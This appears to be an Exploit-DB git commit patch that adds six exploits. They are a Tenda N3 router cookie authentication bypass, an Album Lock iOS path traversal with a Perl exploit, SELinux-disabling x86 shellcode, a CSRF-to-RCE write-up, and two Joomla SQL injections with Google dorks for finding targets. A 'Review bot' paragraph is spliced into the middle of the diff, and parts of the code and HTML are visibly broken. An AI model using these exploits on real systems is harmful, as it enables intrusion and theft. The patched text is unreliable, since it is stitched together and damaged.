From 4195f70adec6e4422b3144219e45641d1ca2a17f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 21 Feb 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-02-21 6 new exploits EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) yaws 1.89 - Directory Traversal Yaws 1.89 - Directory Traversal Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Jogjacamp JProfile Gold - (id_news) SQL Injection Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection Album Lock 4.0 iOS - Directory Traversal Tenda N3 Wireless N150 Home Router - Authentication Bypass
---
 files.csv | 16 ++-
 platforms/hardware/webapps/41402.txt | 38 ++++++
 platforms/ios/webapps/41401.txt | 186 +++++++++++++++++++++++++++
 platforms/lin_x86/shellcode/41403.c | 80 ++++++++++++
 platforms/php/webapps/41392.html | 112 ++++++++++++++++
 platforms/php/webapps/41399.txt | 17 +++
 platforms/php/webapps/41400.txt | 18 +++
 7 files changed, 462 insertions(+), 5 deletions(-)
 create mode 100755 platforms/hardware/webapps/41402.txt
 create mode 100755 platforms/ios/webapps/41401.txt
 create mode 100755 platforms/lin_x86/shellcode/41403.c
 create mode 100755 platforms/php/webapps/41392.html
 create mode 100755 platforms/php/webapps/41399.txt
 create mode 100755 platforms/php/webapps/41400.txt
diff --git a/files.csv b/files.csv
index 053b676f2..025b36f6a 100644
--- a/files.csv
+++ b/files.csv
@@ -9946,12 +9946,12 @@ id,file,description,date,author,platform,type,port
 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0
 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0
 8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0
-8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
+8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0
 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0
-8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
+8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
-8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
+8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0
 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0
 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0
@@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port
 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
-15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
+15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0
 15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
@@ -15899,6 +15899,7 @@ id,file,description,date,author,platform,type,port
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
+41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port
 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
-8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
+8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0
@@ -37310,7 +37311,12 @@ id,file,description,date,author,platform,type,port
 41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41392,platforms/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps,0
 41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
 41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
 41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
+41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
+41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
+41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
+41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
diff --git a/platforms/hardware/webapps/41402.txt b/platforms/hardware/webapps/41402.txt
new file mode 100755
index 000000000..f647a56f3
--- /dev/null
+++ b/platforms/hardware/webapps/41402.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Complete Authentication Bypass In Tenda N3 Wireless N150 Routers
+# Date: 03-09-2015
+# Software Link: http://tendacn.com/en/product/N150.html
+# Exploit Author: Mandeep Jadon
+# Contact: http://twitter.com/1337tr0lls
+# Website: http://twitter.com/1337tr0lls
+# CVE: CVE-2015-5995
+# Category: Device
+
+
+Description:
+
+The router (AP) is using very poor authentication mechanism . It uses a
+static cookie to verify the incoming authentication. After careful
+inspection it was found that the cookie used were same for any number of
+authentication by the Admin .
+
+Thus the cookie can be easily forged and the admin account could be
+compromised without supplying the credentials .
+
+Proof Of Concept:
+
+Inject the following cookie in the browser with the given values :
+
+admin:language : en
+
+Reload the page . You are logged into the admin account .
+
+Video POC : https://www.youtube.com/watch?v=dvF-7KK0g6E
+
+Mitigation :
+
+Use: a secure authentication mechanism consisting of random , complex
+cookies .
+
+References :
+https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5995
+https://www.kb.cert.org/vuls/id/630872
diff --git a/platforms/ios/webapps/41401.txt b/platforms/ios/webapps/41401.txt
new file mode 100755
index 000000000..da6eeda24
--- /dev/null
+++ b/platforms/ios/webapps/41401.txt
@@ -0,0 +1,186 @@
+Document Title:
+===============
+Album Lock v4.0 iOS - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2033
+
+
+Release Date:
+=============
+2017-02-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2033
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Product & Service Introduction:
+===============================
+Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
+convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
+From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
+The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
+
+The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
+are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able
+to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document`
+path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
+web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
+
+The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
+Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
+vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] getObject
+
+Vulnerable Parameter(s):
+[+] filePaht
+
+Affected Module(s):
+[+] Web-Server File System
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Standard Request:
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
+
+
+PoC: Payload
+/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
+
+
+Malicious Request: Exploitation
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
+http://localhost:8880/getImage?filePaht=/var/mobile/
+
+
+PoC: Exploit
+use strict;
+use LWP::UserAgent;
+my $b = LWP::UserAgent->new();
+my $host = "1.1.1.1:5555";
+print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
+Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8880]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
+ Connection[keep-alive]
+ Response Header:
+ Accept-Ranges[bytes]
+
+
+Reference(s):
+http://localhost:8880/
+http://localhost:8880/getImage
+http://localhost:8880/getImage?filePaht=
+http://localhost:8880/list_gif.html
+http://localhost:8880/list_gif.html?folder=
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
+Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
diff --git a/platforms/lin_x86/shellcode/41403.c b/platforms/lin_x86/shellcode/41403.c
new file mode 100755
index 000000000..032587d2a
--- /dev/null
+++ b/platforms/lin_x86/shellcode/41403.c
@@ -0,0 +1,80 @@
+# Title: x86 SELinux change between permissive and enforcing modes shellcode
+# Date: 20-02-2017
+# Author: Krzysztof Przybylski
+# Platform: Lin_x86
+# Tested on: CentOS 6.8 (i686)
+# Shellcode Size: 45 bytes
+# ID: SLAE - 871
+/*
+
+1. Description:
+
+SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
+gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
+
+2. Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 6a 0b push 0xb
+ 8048062: 58 pop eax
+ 8048063: 31 d2 xor edx,edx
+ 8048065: 52 push edx
+ 8048066: 6a 30 push 0x30
+ 8048068: 89 e1 mov ecx,esp
+ 804806a: 52 push edx
+ 804806b: 68 6f 72 63 65 push 0x6563726f
+ 8048070: 68 74 65 6e 66 push 0x666e6574
+ 8048075: 68 6e 2f 73 65 push 0x65732f6e
+ 804807a: 68 2f 73 62 69 push 0x6962732f
+ 804807f: 68 2f 75 73 72 push 0x7273752f
+ 8048084: 89 e3 mov ebx,esp
+ 8048086: 52 push edx
+ 8048087: 51 push ecx
+ 8048088: 53 push ebx
+ 8048089: 89 e1 mov ecx,esp
+ 804808b: cd 80 int 0x80
+
+3. Code
+
+global _start
+section .text
+_start:
+ push 0xb
+ pop eax
+ xor edx, edx
+ push edx
+ push byte 0x30
+ mov ecx, esp
+ push edx
+ push 0x6563726f
+ push 0x666e6574
+ push 0x65732f6e
+ push 0x6962732f
+ push 0x7273752f
+ mov ebx, esp
+ push edx
+ push ecx
+ push ebx
+ mov ecx, esp
+ int 0x80
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x31\xd2\x52\x6a"
+"\x30"
+"\x89\xe1\x52\x68\x6f\x72\x63\x65"
+"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
+"\x73\x65\x68\x2f\x73\x62\x69\x68"
+"\x2f\x75\x73\x72\x89\xe3\x52\x51"
+"\x53\x89\xe1\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
diff --git a/platforms/php/webapps/41392.html b/platforms/php/webapps/41392.html
new file mode 100755
index 000000000..5e2712d26
--- /dev/null
+++ b/platforms/php/webapps/41392.html
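Review bot: In `main()` at the end of the hunk, `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to `%d` and `main()` itself is declared with implicit `int`, which C99 removed; `int main(void)` and `%zu` fix both, and the two `#include` lines have lost their header names (presumably `<stdio.h>` and `<string.h>`), so the file does not compile as committed. Casting the `code` array to a function pointer is likewise undefined behaviour and only runs because the build line in the header passes `-z execstack`. The payload is a bare `execve("/usr/sbin/setenforce", {"/usr/sbin/setenforce", "0", NULL}, NULL)` with no privilege escalation, so it changes the mode only from a process that is already root, and the kernel records the switch as a `MAC_STATUS` audit event; a header line such as `# Note: requires root; the mode change is audited (MAC_STATUS)` would keep the size note from being read as a standalone bypass. Hosts that need enforcing mode to be immutable build the kernel without `CONFIG_SECURITY_SELINUX_DEVELOP`, which removes the runtime switch this payload relies on.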
@@ -0,0 +1,112 @@
+# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to
+Persistent XSS and RCE Through Unrestricted File Upload
+# Date: 30 August 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
+# Version: 1.0.1 to 3.0.3
+
+----------------------------------------------------------------------------------------------------------------------
+
+RSS News AutoPilot Script File:
+http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
+
+Description:
+An Attackers are able to execute js and php code on web
+application using RSS News - AutoPilot Script which allow an attacker to
+create a post when an authenticated user/admin browses a special
+crafted web page. Also, all the process was possible without any
+authenticated user/admin for more info watch the below PoC Video.
+
+The title parameter was not filtering special characters mean
+vulnerable to XSS and while uploading image they weren't filtering the file
+type mean vulnerable to unrestricted file upload. So, now by creating CSRF
+exploit code for posting
+an article with XSS alert JS payload as title of post and php file as a
+image. Now if the
+attacker is able to perform CSRF attack sucessfully then XSS will be
+triggered and we can execute php code too.
+
+PoC Video: https://youtu.be/znDgv8K0yFk
+
+CSRF Exploit Code:
+
+
+
+ [RSS News - AutoPilot Script] CSRF to Persistent XSS and
+RCE
+
+


+
+

[RSS News - AutoPilot Script] CSRF to Persistent +XSS and RCE

+
+ +
+
+
+
+
+Vendor Shouted Urgent Update:
+http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
+
+Fix/Patch: Update to latest version.
+
+----------------------------------------------------------------------------------------------------------------------
+
+Regards,
+Arbin Godar
+https://twitter.com/arbingodar
diff --git a/platforms/php/webapps/41399.txt b/platforms/php/webapps/41399.txt
new file mode 100755
index 000000000..b9c278471
--- /dev/null
+++ b/platforms/php/webapps/41399.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
+# Google Dork: inurl:index.php?option=com_maqmahelpdesk
+# Date: 20.02.2017
+# Vendor Homepage: http://componentslab.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
+# Demo: http://demo.componentslab.com/index.php/department/software-support
+# Version: 4.2.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41400.txt b/platforms/php/webapps/41400.txt
new file mode 100755
index 000000000..6306df46e
--- /dev/null
+++ b/platforms/php/webapps/41400.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_docmanpaypal
+# Date: 20.02.2017
+# Vendor Homepage: http://shopfiles.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
+# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
+# # # # #
+